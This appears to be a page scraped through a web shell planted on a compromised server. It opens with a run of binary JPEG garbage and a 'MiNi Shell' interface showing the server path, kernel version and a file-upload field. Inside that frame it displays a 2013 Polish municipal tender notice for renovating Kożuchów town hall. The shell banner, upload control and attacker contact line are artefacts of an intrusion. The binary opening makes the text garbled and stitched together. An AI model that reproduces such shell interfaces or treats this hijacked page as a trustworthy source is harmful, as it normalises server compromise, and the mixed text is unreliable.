JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130731/306096-N-2013.html

<p class="kh_header"><b>Kożuchów: Termomodernizacja ściany zachodniej Urzędu Miejskiego wraz z remontem 4 pomieszczeń wewnętrznych, częścią korytarza i wymianą dwóch okien</b><br>
<b>Numer ogłoszenia: 306096 - 2013; data zamieszczenia: 31.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kożuchów , ul. Rynek 1A, 67-120 Kożuchów, woj. lubuskie, tel. 68 355 59 40, faks 68 355 28 68.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozuchow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja ściany zachodniej Urzędu Miejskiego wraz z remontem 4 pomieszczeń wewnętrznych, częścią korytarza i wymianą dwóch okien.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje następujące roboty budowlane związane z termomodernizacją budynku Urzędu Miejskiego w Kożuchowie: - docieplenie ścian zewnętrznych, zachodnich, szczytowych metodą bezspoinową z zastosowaniem styropianu o grubości 14 cm; - zmianę kolorystyki elewacji budynku; - wymiana obróbek blacharskich wzdłuż ścian szczytowych zachodnich; Szczegółowy zakres prac został opisany w projekcie budowlanym i specyfikacji technicznej wykonania i odbioru robót stanowiącym załącznik nr 9 i 9a do niniejszej SIWZ. UWAGA: Pomiędzy projektem budowlanym, a STWiOR występuje różnica co do określenia rodzaju styropianu. Wykonawca jest zobowiązany do skosztorysowania w swojej ofercie styropianu wskazanego w STWiOR. Zakres robót obejmuje także remont 4 pomieszczeń wewnętrznych (biur) budynku Urzędu Miejskiego w Kożuchowie usytuowanych na II piętrze, części korytarza oraz wymianę 2 okien na ścianie wschodniej. Remont pomieszczeń obejmuje: 1) W pokoju nr 19: -rozebranie posadzek z wykładzin sztucznych (14,78m2)i położenie nowych bez warstwy izolacyjnej wraz z listwami PCW klejonymi; -wykucie ościeżnic z muru (1sztuka); -wstawienie ościeżnic drzwiowych 2 krotnie malowanych wraz z skrzydłami drzwiowymi płytowymi wewnętrznymi, wejściowymi fabrycznie wykończone pełne; -przygotowanie powierzchni z poszpachlowaniem nierówności (sfalowań) powierzchni tynku (55,65 m2), 2) W pokoju nr 18: -odbicie tynków wewnętrznych na ścianach (12,75 m2) -dwukrotne odgrzybianie ścian ceglanych metodą smarowania (12,75 m2) -wykonanie tynków wewnętrznych zwykłych kategorii III (12,75 m2) -przygotowanie powierzchni z poszpachlowaniem nierówności powierzchni tynku (57 m2) -dwukrotne malowanie farbami emulsyjnymi tynków , ścian i sufitów (57,15 m2) -rozebranie posadzek z wykładzin sztucznych (15,40m2)i położenie nowych bez warstwy izolacyjnej wraz z listwami PCW klejonymi -wykucie z muru ościeżnic stalowych (1 sztuka) -rozebranie ścianek z cegły o grubości ? cegły na zaprawie cementowo-wapiennej -wstawienie ościeżnic drzwiowych 2 krotnie malowanych wraz z skrzydłami drzwiowymi płytowymi wewnętrznymi, wejściowymi fabrycznie wykończone pełne 3) W pokoju nr 17: - odbicie tynków wewnętrznych na ścianach(12,75 m2) - dwukrotne odgrzybianie ścian ceglanych metodą smarowania (12,75 m2) - wykonanie tynków wewnętrznych zwykłych kategorii III (12,75 m2) - przygotowanie powierzchni z poszpachlowaniem nierówności powierzchni tynku (56,5 m2) - dwukrotne malowanie farbami emulsyjnymi tynków , ścian i sufitów (56,5 m2) - rozebranie posadzek z wykładzin sztucznych (15,19m2)i położenie nowych bez warstwy izolacyjnej wraz z listwami PCW klejonymi - demontaż okien z PCV (6,65m2) - wykonanie ścianek działowych z płytek piano- lub gazobetonowych o grubości 12 cm (4,65 m2) wraz z tynkowaniem ręcznym, kategoria III (9,3 m2) -wstawienie ościeżnic drzwiowych 2 krotnie malowanych wraz z skrzydłami drzwiowymi płytowymi wewnętrznymi, wejściowymi fabrycznie wykończone pełne 4) w pokoju nr 16 - dwukrotne malowanie farbami emulsyjnymi tynków , ścian i sufitów (55,65 m2) - przygotowanie powierzchni z poszpachlowaniem nierówności powierzchni tynku (55,65 m2) - demontaż okien z PCV (6,65m2) - wykonanie ścianek działowych z płytek piano- lub gazobetonowych o grubości 12 cm (4,65 m2) wraz z tynkowaniem ręcznym, kategoria III (9,9 m2) - wstawienie ościeżnic drzwiowych 2 krotnie malowanych wraz z skrzydłami drzwiowymi płytowymi wewnętrznymi, wejściowymi fabrycznie wykończone pełne - rozebranie posadzek z wykładzin sztucznych (14,08m2)i położenie nowych bez warstwy izolacyjnej wraz z listwami PCW klejonymi - uzupełnienie ścianek z cegieł o grubości ? cegły (0,3 m2) 5) Korytarz: - dwukrotne malowanie farbami emulsyjnymi tynków , ścian i sufitów (68,75m2) - przygotowanie powierzchni z poszpachlowaniem nierówności powierzchni tynku (68,75 m2) - uzupełnienie cokolików z płytek terakotowych na zaprawie o wymiarach 15x15cm 6) Okna ściana wschodnia ratusza - wykucie i wstawienie dwóch nowych okien zespolonych o wymiarach 202x182cm -wykucie z muru podokienników betonowych z lastryko i zamontowanie parapetów wewnętrznych ( wykonanych z PCV) Wymiary okien i dane techniczne zawiera załącznik nr 9d do SIWZ. Okna wizualnie mają odpowiadać fotografii zamieszczonej w załączniku nr 9d. Wykonawca jest zobowiązany do obmiaru okien we własnym zakresie. Wszystkie prace wymienione w punkcie 2.1 należy wykonać zgodnie z przedmiarem robót stanowiących załącznik nr 9c do niniejszej SIWZ. Wykonawca jest zobowiązany do oszacowania w swojej ofercie innych prac związanych z realizacją tej części zamówienia w szczególności innych prac wykończeniowych lub zabezpieczających. UWAGA: Przedmiar robót będący częścią dokumentacji projektowej jest jedynie dokumentem pomocniczym w wycenie wartości robót. Wykonawca jest zobowiązany do wliczenia w cenę ofertową wszelkich kosztów potrzebnych do prawidłowego i kompletnego wykonania zadania. Przedmiot zamówienia został w niektórych elementach wskazany poprzez podanie standardu (marki handlowej lub jej odpowiednika) dopuszcza się więc do zastosowania (zaproponowania w ofercie) wszelkich równoważnych odpowiedników rynkowych - nie gorszych niż wskazany. Wskazane parametry zastosowanego standardu określają minimalne warunki techniczne, eksploatacyjne, użytkowe i funkcjonalne jakie ma spełniać przedmiot zamówienia. Wskazanie marki lub nazwy producenta określa klasę produktu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.30.00-2, 45.26.21.00-2, 45.26.21.10-5, 45.45.20.00-0, 45.32.00.00-6, 45.26.25.00-6, 45.32.40.00-4, 45.44.21.00-8, 45.42.11.00-5, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości, 1.600,00zł (słownie: jeden tysiąc sześćset złotych 00/100 ). 2. Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy Pzp, tj.: 1) pieniądzu, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3) gwarancjach bankowych, 4) gwarancjach ubezpieczeniowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275 ze zm.). 3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. 4. Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego: Bank Spółdzielczy w Kożuchowie Nr 49967300070000000010070006 5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego. 6. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy załączyć do oferty (w osobnej kopercie). 7. Niewniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku Wykonawca składa oświadczenie zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy w okresie ostatnich 5-ciu lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie) wykonali minimum 2 roboty budowlane na obiekcie wpisanym do rejestru zabytków o zakresie rzeczowym zbliżonym do przedmiotu zamówienia tj. robocie budowlanej obejmującej między innymi prace polegające na ociepleniu ścian budynku. Pod pojęciem -wykonanie w ciągu ostatnich 5 lat- rozumie się zakończenie roboty w tym okresie (protokół odbioru datowany nie wcześniej niż 5 lat przed upływem terminu składania ofert). W celu spełnienia tego warunku wykonawca składa wykaz robót zgodnie z załącznikiem nr 5 do SIWZ.Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku Wykonawca składa oświadczenie zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia objętego przedmiotowym postępowaniem. Wykonawca ubiegający się o zamówienie musi dysponować min.: a) co najmniej 1 osobą wyznaczoną do kierowania robotami budowlanymi w specjalności budowlanej posiadającą uprawnienia do wykonywania samodzielnych funkcji w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity w Dz. U z 2010 r., Nr243, poz. 1623 z późn. zm.) oraz kwalifikacje do prowadzenia robót budowlanych przy zabytkach nieruchomych określone w § 24 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U z 2011 roku nr 165 poz. 987) -udokumentowana co najmniej 2 letnia praktyka zawodowa na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków. W celu wykazania spełnienia powyższego warunku należy przedstawić wykaz osób zgodnie z załącznikiem nr 4 do SIWZ oraz oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (wskazane w wykazie,) posiadają wymagane uprawnienia. Oświadczenie należy sporządzić zgodnie ze wzorem stanowiącym Załącznik nr 4a do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej pozwalającej na realizację zamówienia objętego przedmiotowym postępowaniem. W celu potwierdzenia spełnienia tego warunku Wykonawca zobowiązany jest posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100.000,00 PLN (słownie: sto tysięcy złotych). W celu wykazania spełnienia tego warunku do oferty dołączyć należy: Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż 100.000,00 PLN (słownie: sto tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz ofertowy - załącznik nr 1</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadku konieczności zmiany terminu realizacji w związku z zaistnieniem przynajmniej jednego z punktów: 1) koniecznością wprowadzenia zmian w dokumentacji projektowej, a wynikających z konieczności dostosowania zakresu zadania do powszechnie obowiązujących przepisów prawa; 2) z brakiem możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych; 3) działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego; 4) nieterminowym, z przyczyn niezależnych od Wykonawcy, przekazaniem przez Zamawiającego terenu budowy Wykonawcy; 5) wstrzymaniem prac budowlanych przez właściwy organ zwłaszcza przez Wojewódzkiego Lubuskiego Konserwatora Zabytków z przyczyn niezawinionych przez Wykonawcę; 6) opóźnieniem związanym z uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów; 7) innymi okolicznościami nie powstałymi z winy Wykonawcy; 8) koniecznością wykonania zamówień dodatkowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.wrota.lubuskie.pl/ugkozuchow/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kożuchowie ul. Rynek 1a 67-120 Kożuchów pokój nr 23..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2013 godzina 13:00, miejsce: Urząd Miejski w Kożuchowie ul. Rynek 1a 67-120 Kożuchów pokój nr 9 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com